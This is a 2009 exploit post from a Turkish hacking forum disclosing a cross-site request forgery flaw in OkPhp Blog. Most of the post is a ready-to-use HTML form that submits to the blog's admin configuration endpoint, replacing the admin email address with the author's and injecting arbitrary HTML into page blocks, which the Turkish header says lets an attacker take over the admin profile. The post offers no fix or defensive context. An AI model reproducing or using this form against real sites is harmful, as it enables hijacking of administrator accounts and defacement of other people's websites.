ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> OkPhp Blog ~ XSRF Vuln.
OkPhp Blog ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/BARCOD3
Date :
04.11.2009 23:46:34
#
OkPhp Blog ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : OKPhp Blog # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak victim.com’a meta atilabilir, e-mail adresi degistirilip admin profili ele geçirilebilir. # author : BARCOD3 - Bug Researchers # Demo : http://demo.okphp.com/sns/ Admin; demo@okphp.com password ; demo # Home : ozkanbozkurt.com ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <h3>BARCOD3</h3> <form action=http://demo.okphp.com/sns/admin/configpost method=post> <input type=text name=site_name value=Ozkanbozkurt.com or codes /> <select name=story_access> <option value=all selected >All</option> option value=member >Only members</option> </select> <select name=profile_access> <option value=all selected >All</option> <option value=member >Only members</option> </select> <input type=text name=email value=ozk4nbozkurt@hotmail.com /> <textarea name=locations style=width:200px rows=12>Turkey</textarea> <input type=checkbox name=youtube_upload value=1 checked /> <input type=text name=youtube_username value=utubeusername? /> <input type=password name=youtube_password value=password /> <input type=text name=youtube_dev_key size=50 value=YourDeveloperKeyHere /> <input type=text name=youtube_category value=VideoCategory /> <input type=text name=youtube_tags value=lifestyle /> <input type=text name=youtube_prefix value=ÖnizLeme Linki /> <textarea name=block_top style=width:450px;height:90px><div style= width:600px; border: #ECEFF5 2px solid; height: 60px;margin:15px auto auto auto> UR HTML codes / Meta </div></textarea> <textarea name=block_left style=width:450px;height:90px><div style= width:500px; border: #ECEFF5 2px solid; height: 100px> UR HTML codes / Meta </div></textarea> <textarea name=block_right style=width:150px;height:200px><div style= width:300px; border: #ECEFF5 2px solid; height: 200px> block: Sidebar </div></textarea> <textarea name=block_bottom style=width:450px;height:90px>ur HTML codes / Meta</textarea> <input type=checkbox name=friend_admin checked value=1 />Friend admin <input type=checkbox value=1 name=offline /> Offline <input type=submit class=button value=Save changes /> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
